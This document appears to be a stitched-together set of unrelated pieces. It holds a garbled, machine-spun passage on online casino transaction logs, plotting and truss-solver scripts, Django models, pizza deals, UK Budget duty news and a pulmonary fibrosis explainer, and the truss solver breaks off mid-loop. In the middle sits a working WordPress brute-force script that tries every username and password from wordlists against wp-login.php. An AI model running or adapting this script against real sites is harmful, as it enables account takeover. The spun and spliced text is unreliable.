outcomes on each of the pay lines and payouts, if any were won log. This is done at every twist. A comparative system is performed for every amusement, considering the particular necessities of the diversion.
The money related exchange log will record each store and withdrawal by the player and how these have been did. It will likewise hold the exchanges for the plays and pays the rewards. In both, both the gaming and the budgetary exchange log, the date and time are additionally logged. This exchange logging wakes the certainty of the players in two ways. It demonstrates that online clubhouse are totally straightforward in managing his information. In instances of uncertainty, the player realizes that he look in the exchange history to look carefully to what was going on. In the event that the online gambling club, for instance, keeps up that the application prerequisites had not been satisfied by the player, it can check the exchange history this yourself. Furthermore, in the far-fetched occasion that the question would wind up in court, the player knows precisely which the inspecting judge access to the complete and revise review log records will have.
The second advantage of exchange logging is to help the player in its choice making to. Take the case of a player who is in a specific circumstance in a blackjack diversion. He recalls that he was in a comparable circumstance a couple of weeks prior, yet can not partout recollect what he has done as of now. He can figure out with the assistance of exchange history, what he had done then and what the result was. Along these lines, he has more opportunity to have the capacity to consider a fresher choice. The precise way how exchange logging is changed by programming sellers to programming merchants before him. At the base of the table are online clubhouse, where the player must send an email to the gambling club to ask after his exchange history.
can check what he needs, and after ward keep on playing as though nothing had happened. |
import numpy as np
import matplotlib.pyplot as plt
from sys import argv
import matplotlib.gridspec as gridspec
from scipy.signal import argrelextrema
from scipy.interpolate import interp1d
from matplotlib.ticker import FormatStrFormatter
import matplotlib.patches as patches
import matplotlib.pyplot as plt
def main(energy_path,fName, interpolate=False):
usetrueminimas = True
usetrueminimas = False
minimums = argrelextrema(energy_path, np.less_equal)[0]
#print(energy_path[minimums])
maxima = argrelextrema(energy_path, np.greater)[0]
#print(energy_path[maxima])
energy_path = energy_path - np.min(energy_path)
#if(usetrueminimas):
# energy_path=energy_path[minimums[0]:minimums[-1]]
#
fig, ax = plt.subplots()
#ax.yaxis.set_major_formatter(FormatStrFormatter('%.1f'))
#ax.set_xticklabels([]) # disable ticks
#ax.set_aspect('auto')
M = energy_path.shape[0]
#plt.yticks(np.arange(min(energy_path), max(energy_path)+0.4, 0.1))
plt.ylim([np.min(energy_path) - .06, np.max(energy_path) + .4])
plt.ylabel('eV')
plt.xlim([0-5, M+7])
x = range(0, M)
y = energy_path
plt.plot(energy_path, linewidth=3)
#f2 = interp1d(x, y, kind='cubic')
#xnew = np.linspace(0, M-1, num=1000, endpoint=True)
#
#if(interpolate):
# plt.plot(xnew, f2(xnew), linewidth=3)
#else:
# plt.plot(x, y, linewidth=3)
#
#rn = ['I','II','III','IV','V','VI','VII']
#
#if(usetrueminimas):
# minimums = (minimums-minimums[0]) #shift the index of minimas to match new size of enrgy
# minimums[-1] = minimums[-1]-1
#
#ax.plot([minimums], [energy_path[minimums]], 'o', color='green')
#for i in range(len(minimums)):
#ax.annotate(rn[i], xy=(minimums[i], energy_path[minimums[i]]), xytext=(minimums[i]-2, energy_path[minimums[i]]-0.04))#, arrowprops=dict(facecolor='black', shrink=0.05),)
#ax.annotate(rn[i], xy=(minimums[i], energy_path[minimums[i]]), xytext=(minimums[i]-0.2, energy_path[minimums[i]]-0.006))#, arrowprops=dict(facecolor='black', shrink=0.05),)
plt.savefig((f"{fName}.eps"),bbox_inches='tight', dpi=300)
if __name__ == "__main__":
try:
print(argv[0],argv[1],argv[2])
energy_path = np.loadtxt(argv[1])
main(energy_path, argv[2])
#script, params_file, runtime_settings, vcoords_file = argv
except:
print("ERROR: You didn't provide the params file for the programm", argv[0])
|
Deals For "National Pizza Day"
Papa John’s -Get 25% off all regular-price pizzas.
Pilot Flying J - Download the myPilot app to get a free slice.
Pizza Hut - Get two medium pizzas for $6.99 each and Hut Rewards members save 30% on menu-priced pizzas. |
from django.db import models
from core.models import BaseEMSModel, Organization
class GeoDistrict(BaseEMSModel):
"""EML 150."""
# TODO: At some point, consider using django-mptt
# TODO: Should we have a separate model for the district type, where
# things defining the type of district can be made (ex. pollings places are at this level)?
organization = models.ForeignKey(Organization)
name = models.CharField(max_length=100, default='Global')
LEVEL = (
('Global', 'Global'),
('Continent', 'Continent'),
('Nation', 'Nation'),
)
level = models.CharField(max_length=12, blank=True, null=True, choices=LEVEL, default='Global')
short_name = models.CharField(max_length=20, blank=True)
description = models.CharField(max_length=250, blank=True,
default='The global district all voters and elections are assigned to '
'by default. Elections can take place anywhere in the world.')
parent = models.ForeignKey('GeoDistrict', null=True, blank=True, default=None)
def __str__(self):
return self.name
class PollingLocation(BaseEMSModel):
name = models.CharField(max_length=100, default='Polling Place')
address = models.CharField(max_length=100, blank=True, null=True)
is_active = models.BooleanField(default=True)
geo_district = models.ForeignKey(GeoDistrict, null=True, blank=True, default=None)
def __str__(self):
return self.name |
DRINKERS have been given a gift in today’s Budget as the Chancellor Philip Hammond announced duty will be frozen on beer, wine and spirits.
While an average pack of fags, such as Lambert & Butler, will go up to £9.30.
The changes take effect from 6pm tonight.
This is because the Chancellor announced a rise of two per cent above inflation.
Hand rolling tobacco will also increase by an extra per cent.
The tobacco industry last week voiced concerns that the Chancellor would use the Budget to increase the amount of tax raised from sales of tobacco.
The Chancellor pushed up a pack of 20 by 35p in the last budget and the industry has also been hit by other hikes.
As a result, the average cost of a premium pack of 20 cigarettes now stands at £9.91 in the UK, according to the Tobacco Manufacturers’ Association (TMA).
The TMA now estimates the Government could push the price of a pack of 20 above £10.
In March, the Chancellor promised to increase fuel duty in line with inflation or 3.9 per cent.
The first hike in five years has seen an increased strain on local pubs – with wine up by 8p, vodka up by 40p and gin by 43p.
Britain’s alcohol is among the most heavily taxed in the world – with the third highest duty rate for wine, and fourth-highest for spirits. |
#!usr/bin/python3
# Modules related comments are only applied in this Script.
import requests # Using this module to send request and getting response from local_server.
import sys # Using this module for writting formated text on the terminal.
from colorama import Fore,Style # Using this module for Formating my text means appling color,style,size.. etc
import time
import os # Using this module to print execution time of main() function.
def main():
os.system("clear") # clear the screen.
print(Fore.CYAN + "##########################################################// \\\################################################################")
print(Fore.CYAN + "#########################################################// $ $ WeLCoMe $ $ \\\###############################################################")
time.sleep(0.5)
print(Fore.CYAN + '''########################################################// \\\##############################################################''')
time.sleep(0.5)
print(Fore.CYAN + '''#######################################################// \\\#############################################################''')
time.sleep(0.5)
print(Fore.CYAN + "######################################################// \\\############################################################")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t #// \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t#// W_PRESS.PY \\\#")
time.sleep(0.5)
print(Fore.CYAN + "\t\t\t\t\t\t#//''''''''''''''''''''''''''''''''''\\\#")
time.sleep(0.5)
print(Fore.CYAN +"\t\t\t\t\t\t#//________Written By: Satyajeet________\\\#")
time.sleep(0.5)
print(Fore.RED+'\n\n\t\t'+Fore.YELLOW+'Watch: https://youtu.be/sh2klOT3uws ||'+Fore.RED+'|| Download: https://github.com/satyajeet76626/WordPress_BrutForce.git')
time.sleep(0.3)
print(Fore.RED + "\n\n\t\t\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> WaRnInG..!!! : <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
time.sleep(0.3)
print(Fore.RED + '\n\t\t\t\t"::::::::If you are not able to RUN this script, Please! Read README file::::::::"')
print(Fore.RED + '\n\t\t\t\t:::::::::::::::::::::::::::'+Fore.YELLOW +'"OR Run installer.py"'+Fore.RED+':::::::::::::::::::::::::::::::')
# collecting url in a variable 'url'.
url = 'http://localhost/wp-login.php'
print(Fore.CYAN+"\n\nNOTE : "+Fore.WHITE+"Put your 'Users_list' and 'Password_list' File in same directory where 'w_press.py Script is.'" )
print(Fore.YELLOW + "\n\nW_PrEsS >> ",end=' ')
# Taking input of users_list and password_list from user.
userslist_file=input(Fore.GREEN + "Enter Users_list fileName: ")
print(Fore.YELLOW + "\n\nW_PrEsS >> ",end=' ')
passwordslist_file=input(Fore.GREEN + "Enter Password_list fileName: ")
# Reading UserName and PassWord from files.
users=open(userslist_file,'r').readlines()
passwords=open(passwordslist_file,'r').readlines()
print(Fore.YELLOW+"\n\t\t\t______________Thanks For Using..!! ('Sit_back && Have Your Coffee!')________________")
# Finding Total Number of UserNames and PassWords
users_len=len(users)
pass_len=len(passwords)
total=(users_len*pass_len)
print(Fore.CYAN + "\n\n\rTotAl Passw0rD tO TrY: ",total)
c=0
for user in users:
for passwd in passwords:
# Sending request and getting response with UserName & PassWord to the local server(apache2) on wordpress website.
http = requests.post(url, data = {'log':user,'pwd':passwd,'wp-submit':'Log In'})
datas = http.content
# tryingh to match word 'Dashboard' in the content.
if 'Dashboard' in str(datas):
c+=1
complete=(c*100)//total
# Formatting My OutPut to display my contents in a better way.
sys.stdout.write(Fore.YELLOW + "\n\n\r[+] FouNd UserName: " + Fore.GREEN + "'{}'".format(user))
sys.stdout.write(Fore.YELLOW + "\n\n\r[+] FouNd PassW0rd: " + Fore.GREEN + "'{}'".format(passwd))
print(Fore.BLUE + "\n\nPasswords checked: ",end=" ")
print(Fore.GREEN + "{}".format(c),)
print(Fore.MAGENTA + "\t\t\t\t\t"+ Fore.GREEN +" {}%".format(complete),end=' ')
print(Fore.MAGENTA+"CompLeTed.....\n\n")
# Quiting or Breaking the loop.
quit()
else:
c+=1
complete=(c*100)//total
sys.stdout.write(Fore.RED + "\r\t\t\t\t\t\t[-] tRyInG....."+Fore.GREEN + "\t{}%".format(complete))
sys.stdout.flush()
print(Fore.CYAN+"\n\n\t\t\t\t\t\tSoRRy!!, PaSSwOrD NoT FoUnD.!\n")
quit()
# Resetting the Formated text color and styles.
# print(Style.RESSET)
# Uncomment below lines to display program execution time.
# t0=time.time()
# main()
# t1=time.time()
# print("ExecuTion Time: ",t1-t0)
if __name__=='__main__':main()
|
Pulmonary fibrosis is an uncommon lung disease wherein the lung tissue becomes scarred and thick. These scars are called fibrosis. Often the cause is unknown and hence, it is called idiopathic pulmonary fibrosis (IPF). It is a serious disease affecting the middle-aged or older individuals. It can result in respiratory failure, pulmonary hypertension, heart failure, pulmonary embolism (blood clot in the arteries supplying the lung), and lung cancer.
The cause of idiopathic pulmonary fibrosis is unknown but certain environmental factors and pollutants exposure have shown to increase the risk of pulmonary fibrosis. Factors like cigarette smoking, exposure to metal dust, wood dust, stone dust, silica, hay dust, mould spores or agricultural products predispose an individual to the development of pulmonary fibrosis. Mostly men are affected and it is more frequent in people above 50 years of age.
About 20% people with IPF are known to have another family member diagnosed with an interstitial lung disease. If more than one member is suffering from this condition in a family, then it is called familial pulmonary fibrosis.
75% of patients with IPF also have gastroesophageal reflux disease (GERD).
A multidisciplinary approach by the pulmonologist, radiologist, and pathologist is needed to diagnose idiopathic pulmonary fibrosis since the symptoms are often similar to those of asthma, chronic obstructive pulmonary disease (COPD), and congestive heart failure. Your doctor will diagnose it based on your medical history, physical exam, and test results like X-rays, high resolution computed tomography (CT), lung function tests, pulse oximetry, arterial blood gas test, skin test for tuberculosis, exercise testing, and lung biopsy.
Your doctor may treat the condition with medicines, oxygen therapy, pulmonary rehabilitation, and lung transplant. Some additional medicines are prescribed to treat breathlessness and cough. Antacid therapy for gastroesophageal reflux disease (GERD) is also given.
Medicines listed below are available for Idiopathic Pulmonary Fibrosis. Please note that you should not take any medicines without doctor consultation. Taking any medicine without doctor's consultation can cause serious problems. |
#
# -*- coding: utf-8 -*-
#
# Python-Based Truss Solver
# =============================================================
#
# Author: Robert Grandin
#
# Date: Fall 2007 (Creation of original Fortran solution in AerE 361)
# October 2011 (Python implementation)
# November 2014 (Clean-up and graphical/VTK output)
#
#
# PURPOSE:
# This code solves a truss for the internal load, strain, and stress of each member.
# Being a truss, all members are assumed to be two-force members and no bending
# moments are considered. Both 2-dimensional and 3-dimensional trusses can be
# solved with this code.
#
#
# INSTRUCTIONS & NOTES:
# - Dictionaries are used to define the entity properties. Names for the properties
# should be self-explanatory. Some notes:
# - '_flag' entries identify either displacement ('d') or force ('f') boundary
# conditions (BCs). Applied forces require force BCs to be specified.
# Pin/roller locations require displacement BCs. Free-to-move nodes will
# typically have 0-force BCs.
# - '_bcval' entries specify the BC value for the corresponding flag.
# - If solving a 2-dimensional problem, constrain node motion in the 3rd
# dimension to be 0. Allowing nodal motion in the 3rd dimension (by setting
# the constraint to 0-force) will produce a matrix with non-empty null-space.
# Displacements in the third dimension will reside in this null-space.
# - Input data can be saved in a python data file. Create a module for your
# problem and define a function which returns 'nodes, members'.
# - Examples shown below for 2D, 3D, and file-based input. See data file
# 'em514_problem08.py' for an example of how to write an input file.
#
#
# HOMEWORK DISCLAIMER:
# This tool is intended to be a learning aid. Feel free to use it to check your
# work, but do not use it in place of learning how to find the solution yourself.
#
# When using this tool for statics problems, the member loads calculated by this
# tool will not match the correct answer for the statics problem. This is due
# to the fact that this tool considers displacements whereas displacements are
# not considered in a statics problem (but displacements are considered in
# mechanics problems). Even though the numerical results will not match when
# checking statics results, the discrepancy should be small enough to enable
# you to determine if your statics result is correct.
#
#
#
# ========================
#
# 2D SAMPLE INPUT
#
#nodes = [{'x': 0.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': -800.0e0, 'zflag': 'd', 'zbcval': 0.0e0}]
#nodes.append({'x': 36.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 72.0e0, 'y': 18.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 36.0e0, 'y': 18.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': -1000.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#
#members = [{'start': 0, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6}]
#members.append({'start': 1, 'end': 2, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 1, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 2, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 0, 'end': 3, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#
#
#
# ========================
#
# 3D SAMPLE INPUT
#
#nodes = [{'x': 0.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0}]
#nodes.append({'x': 20.0e0, 'y': 0.0e0, 'z': 0.0e0, 'xflag': 'f', 'xbcval': 0.0, 'yflag': 'f', 'ybcval': 0.0e0, 'zflag': 'f', 'zbcval': 1000.0e0})
#nodes.append({'x': 0.0e0, 'y': 25.0e0, 'z': 0.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#nodes.append({'x': 0.0e0, 'y': 0.0e0, 'z': 10.0e0, 'xflag': 'd', 'xbcval': 0.0, 'yflag': 'd', 'ybcval': 0.0e0, 'zflag': 'd', 'zbcval': 0.0e0})
#
#members = [{'start': 0, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6}]
#members.append({'start': 1, 'end': 2, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#members.append({'start': 3, 'end': 1, 'E': 30.0e6, 'A': 1.0e0, 'sigma_yield': 36.0e6, 'sigma_ult': 66.0e6})
#
#
#
# ========================
#
# DATA FILE SAMPLE INPUT
#
import em274_assess5_2017 # Name of python file, no extension
reload(em274_assess5_2017) # Force reload to catch any updates/revisions
nodes, members = em274_assess5_2017.DefineInputs() # Call input-definition function
# Set scale factor to make display more-easily understood.
displayScaleFactor = 100.0
# =============================================================================================
#
#
#
# NO EDITS REQUIRED BELOW HERE
#
#
#
# =============================================================================================
# ========================
#
# IMPORT PYTHON MODULES REQUIRED FOR SOLUTION
#
import numpy # General linear algebra capability
import scipy # Advanced routines for evaluating solution quality
import matplotlib.pyplot as plt # 2D plotting
# ========================
#
# ECHO INPUT VALUES TO SCREEN
#
# Calculate Member Properties
nnodes = len(nodes)
nmem = len(members)
# Write Input Information
print(' ')
print('==============================================')
print(' ')
print(' INPUT INFORMATION')
print(' ')
print('==============================================')
print(' ')
print('Pin Input Information')
print('--------------------------------------')
for i in range(nnodes):
print('Node % 3d' % (i))
print(' Position: ( % 12.3g, % 12.3g, % 12.3g )' % (nodes[i]['x'], nodes[i]['y'], nodes[i]['z']))
print(' BC Type: ( %*.*s, %*.*s, %*.*s )' % (12,12,nodes[i]['xflag'], 12,12,nodes[i]['yflag'], 12,12,nodes[i]['zflag']))
print(' BC Value: ( % 12.3g, % 12.3g, % 12.3g )' % (nodes[i]['xbcval'], nodes[i]['ybcval'], nodes[i]['zbcval']))
print(' ')
print(' ')
print(' ')
print(' ')
print('Member Input Information')
print('--------------------------------------')
for i in range(nmem):
print('Member % 3d' % (i))
print(' Start, end nodes: ( % 3d, % 3d )' % (members[i]['start'], members[i]['end']))
print(' Young\'s Modulus: % 12.3g' % (members[i]['E']))
print(' Cross-sectional Area: % 12.3g' % (members[i]['A']))
print(' Yield Strength: % 12.3g' % (members[i]['sigma_yield']))
print(' Ultimate Strength: % 12.3g' % (members[i]['sigma_ult']))
print(' ')
print(' ')
print(' ')
print(' ')
# ========================
#
# SETUP MATRIX EQUATION AND SOLVE
#
# Calculate member properties
for i in range(nmem):
dx = nodes[members[i]['end']]['x'] - nodes[members[i]['start']]['x']
dy = nodes[members[i]['end']]['y'] - nodes[members[i]['start']]['y']
dz = nodes[members[i]['end']]['z'] - nodes[members[i]['start']]['z']
members[i]['L'] = numpy.sqrt(dx*dx + dy*dy + dz*dz)
members[i]['costheta_x'] = dx/members[i]['L']
members[i]['costheta_y'] = dy/members[i]['L']
members[i]['costheta_z'] = dz/members[i]['L']
# Build stiffness matrix
stiffness = numpy.zeros((3*nnodes,3*nnodes), dtype='float64')
G = numpy.zeros((6,6), dtype='float64')
for i in range(nmem):
tbm2 = 3*members[i]['start'] + 2
tbm1 = 3*members[i]['start'] + 1
tb = 3*members[i]['start']
tem2 = 3*members[i]['end'] + 2
tem1 = 3*members[i]['end'] + 1
te = 3*members[i]['end']
k = members[i]['A']*members[i]['E']/members[i]['L']
stiffness[tb][tb] += k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[tb][tbm1] += k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[tb][tbm2] += k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[tb][te] += -k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[tb][tem1] += -k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[tb][tem2] += -k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[tbm1][tb] += k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tbm1][tbm1] += k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tbm1][tbm2] += k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tbm1][te] += -k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tbm1][tem1] += -k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tbm1][tem2] += -k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tbm2][tb] += k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tbm2][tbm1] += k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tbm2][tbm2] += k*members[i]['costheta_z']*members[i]['costheta_z']
stiffness[tbm2][te] += -k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tbm2][tem1] += -k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tbm2][tem2] += -k*members[i]['costheta_z']*members[i]['costheta_z']
stiffness[te][tb] += -k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[te][tbm1] += -k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[te][tbm2] += -k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[te][te] += k*members[i]['costheta_x']*members[i]['costheta_x']
stiffness[te][tem1] += k*members[i]['costheta_x']*members[i]['costheta_y']
stiffness[te][tem2] += k*members[i]['costheta_x']*members[i]['costheta_z']
stiffness[tem1][tb] += -k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tem1][tbm1] += -k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tem1][tbm2] += -k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tem1][te] += k*members[i]['costheta_y']*members[i]['costheta_x']
stiffness[tem1][tem1] += k*members[i]['costheta_y']*members[i]['costheta_y']
stiffness[tem1][tem2] += k*members[i]['costheta_y']*members[i]['costheta_z']
stiffness[tem2][tb] += -k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tem2][tbm1] += -k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tem2][tbm2] += -k*members[i]['costheta_z']*members[i]['costheta_z']
stiffness[tem2][te] += k*members[i]['costheta_z']*members[i]['costheta_x']
stiffness[tem2][tem1] += k*members[i]['costheta_z']*members[i]['costheta_y']
stiffness[tem2][tem2] += k*members[i]['costheta_z']*members[i]['costheta_z']
# Calculate average of main diagonal for numerical stability
average = 0.0e0
for i in range(3*nnodes):
average += stiffness[i][i]
average /= float(3*nnodes)
# Create and fill arrays to be used when solving matrix equation
A = numpy.zeros(stiffness.shape, dtype='float64')
b = numpy.zeros((3*nnodes,1), dtype='float64')
for i in range(nnodes):
icol = 3*i
if(nodes[i]['xflag'] == 'd'):
for j in range(3*nnodes):
b[j] -= stiffness[j][icol]*nodes[i]['xbcval']
A[icol][icol] = -average
if(nodes[i]['xflag'] == 'f'):
b[icol] += nodes[i]['xbcval']
for j in range(3*nnodes):
A[j][icol] = stiffness[j][icol]
icol = 3*i + 1
if(nodes[i]['yflag'] == 'd'):
for j in range(3*nnodes):
b[j] -= stiffness[j][icol]*nodes[i]['ybcval']
A[icol][icol] = -average
if(nodes[i]['yflag'] == 'f'):
b[icol] += nodes[i]['ybcval']
for j in range(3*nnodes):
A[j][icol] = stiffness[j][icol]
icol = 3*i + 2
if(nodes[i]['zflag'] == 'd'):
for j in range(3*nnodes):
b[j] -= stiffness[j][icol]*nodes[i]['zbcval']
A[icol][icol] = -average
if(nodes[i]['zflag'] == 'f'):
b[icol] += nodes[i]['zbcval']
for j in range(3*nnodes):
A[j][icol] = stiffness[j][icol]
# Solve the system
x,res,rank,singularvals = numpy.linalg.lstsq(A,b)
# Calculate nodal results
for i in range(nnodes):
if(nodes[i]['xflag'] == 'f'):
nodes[i]['xdisp'] = x[3*i+0][0]
nodes[i]['xforce'] = nodes[i]['xbcval']
if(nodes[i]['xflag'] == 'd'):
nodes[i]['xdisp'] = nodes[i]['xbcval']
nodes[i]['xforce'] = x[3*i+0][0]
if(nodes[i]['yflag'] == 'f'):
nodes[i]['ydisp'] = x[3*i+1][0]
nodes[i]['yforce'] = nodes[i]['ybcval']
if(nodes[i]['yflag'] == 'd'):
nodes[i]['ydisp'] = nodes[i]['ybcval']
nodes[i]['yforce'] = x[3*i+1][0]
if(nodes[i]['zflag'] == 'f'):
nodes[i]['zdisp'] = x[3*i+2][0]
nodes[i]['zforce'] = nodes[i]['zbcval']
if(nodes[i]['zflag'] == 'd'):
nodes[i]['zdisp'] = nodes[i]['zbcval']
nodes[i]['zforce'] = x[3*i+2][0]
nodes[i]['xnew'] = nodes[i]['x'] + nodes[i]['xdisp']
nodes[i]['ynew'] = nodes[i]['y'] + nodes[i]['ydisp']
nodes[i]['znew'] = nodes[i]['z'] + nodes[i]['zdisp']
# Calculate member results
for i in range(nmem):
dx = nodes[members[i]['end']]['xnew'] - nodes[members[i]['start']]['xnew']
dy = nodes[members[i]['end']]['ynew'] - nodes[members[i]['start']]['ynew']
dz = nodes[members[i]['end']]['znew'] - nodes[members[i]['start']]['znew']
members[i]['Lnew'] = numpy.sqrt(dx*dx + dy*dy + dz*dz)
members[i]['epsilon'] = (members[i]['Lnew'] - members[i]['L'])/members[i]['L']
members[i]['stress'] = members[i]['epsilon']*members[i]['E']
members[i]['load'] = members[i]['stress']*members[i]['A']
# Calculate null space of A (http://stackoverflow.com/questions/2992947/calculating-the-null-space-of-a-matrix)
u, s, vh = numpy.linalg.svd(A)
null_mask = (s <= 1.0e-15)
null_space = scipy.compress(null_mask, vh, axis=0)
nullspace = scipy.transpose(null_space)
# ========================
#
# OUTPUT RESULTS TO TERMINAL
#
print(' ')
print('==============================================')
print(' ')
print(' RESULTS')
print(' ')
print('==============================================')
print(' ')
print('Pin Displacements (x,y,z)')
print('--------------------------------------')
for i in range(nnodes):
print('Node % 3d: % 10.5e % 10.5e % 10.5e' % (i,nodes[i]['xdisp'],nodes[i]['ydisp'],nodes[i]['zdisp']))
print(' ')
print(' ')
print('Member Results')
print('--------------------------------------')
for i in range(nmem):
print('Member % 3d:' % (i))
print(' Internal Load: % 10.5e' % (members[i]['load']))
print(' Axial Strain: % 10.5e' % (members[i]['epsilon']))
print(' Axial Stress: % 10.5e' % (members[i]['stress']))
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
print(' --> YIELD STRESS SURPASSED')
if(members[i]['stress'] > members[i]['sigma_ult']):
print(' --> ULTIMATE STRESS SURPASSED')
print(' ')
print(' ')
print(' ')
print(' ')
print('==============================================')
print(' ')
print(' SOLUTION QUALITY INDICATORS')
print(' ')
print('==============================================')
print(' ')
print('Rank of A matrix: %d' % (rank))
print(' ')
print('Size of A: %d' % (3*nnodes))
print(' ')
print('Condition Number: % 10.3e (smaller is better)' % (singularvals.max()/singularvals.min()))
print(' General rule: If condition number is O(10^n), discard last n digits')
print(' from the results.')
print(' ')
print('Singular values: ')
for i in range(len(singularvals)):
print(' % 12.10g' % (singularvals[i]))
print(' ')
print('Nullspace of A:')
print nullspace
# ========================
#
# GENERATE PLOTS
#
xOriginal = numpy.zeros((nnodes))
yOriginal = numpy.zeros((nnodes))
zOriginal = numpy.zeros((nnodes))
xNew = numpy.zeros((nnodes))
yNew = numpy.zeros((nnodes))
zNew = numpy.zeros((nnodes))
for i in range(nnodes):
xOriginal[i] = nodes[i]['x']
xNew[i] = xOriginal[i] + nodes[i]['xdisp']*displayScaleFactor
yOriginal[i] = nodes[i]['y']
yNew[i] = yOriginal[i] + nodes[i]['ydisp']*displayScaleFactor
zOriginal[i] = nodes[i]['z']
zNew[i] = zOriginal[i] + nodes[i]['zdisp']*displayScaleFactor
xmin1 = numpy.min(xOriginal)
xmin2 = numpy.min(xNew)
xmin = min(xmin1,xmin2)
ymin1 = numpy.min(yOriginal)
ymin2 = numpy.min(yNew)
ymin = min(ymin1,ymin2)
zmin1 = numpy.min(zOriginal)
zmin2 = numpy.min(zNew)
zmin = min(zmin1,zmin2)
xmax1 = numpy.max(xOriginal)
xmax2 = numpy.max(xNew)
xmax = min(xmax1,xmax2)
ymax1 = numpy.max(yOriginal)
ymax2 = numpy.max(yNew)
ymax = min(ymax1,ymax2)
zmax1 = numpy.max(zOriginal)
zmax2 = numpy.max(zNew)
zmax = min(zmax1,zmax2)
xRange = xmax - xmin
yRange = ymax - ymin
zRange = zmax - zmin
factor = 0.02
# Generate XY view
plt.figure()
plt.plot(xOriginal, yOriginal, 'ob', label='Original Position')
plt.hold(True)
plt.plot(xNew, yNew, 'or', label='New Position')
for i in range(nmem):
xx = [xOriginal[members[i]['start']], xOriginal[members[i]['end']]]
yy = [yOriginal[members[i]['start']], yOriginal[members[i]['end']]]
plt.plot(xx, yy, '-b')
xx2 = [xNew[members[i]['start']], xNew[members[i]['end']]]
yy2 = [yNew[members[i]['start']], yNew[members[i]['end']]]
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ffa500")
if(members[i]['stress'] > members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ff2500")
else:
plt.plot(xx2, yy2, color="#006600")
plt.xlim([xmin - xRange*factor, xmax + xRange*factor])
plt.ylim([ymin - yRange*factor, ymax + yRange*factor])
plt.xlabel('X Position')
plt.ylabel('Y Position')
plt.title('Truss - XY View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
plt.grid(True)
plt.legend()
plt.savefig('Truss_XY_View.png')
# If displacement in the Z-direction exists, plot XZ and YZ views. Note that
# the zRange cannot be compared to precisely '0' due to floating-point errors,
# so it is compared to a very small value instead. Also note that 'x' and 'y'
# refer to the 2D plot and therefore do not necessarily correspond directly
# to the 'x' and 'y' coordinates of the nodes.
if(zRange > 1.0e-5):
plt.figure()
plt.plot(xOriginal, zOriginal, 'ob', label='Original Position')
plt.hold(True)
plt.plot(xNew, zNew, 'or', label='New Position')
for i in range(nmem):
xx = [xOriginal[members[i]['start']], xOriginal[members[i]['end']]]
yy = [zOriginal[members[i]['start']], zOriginal[members[i]['end']]]
plt.plot(xx, yy, '-b')
xx2 = [xNew[members[i]['start']], xNew[members[i]['end']]]
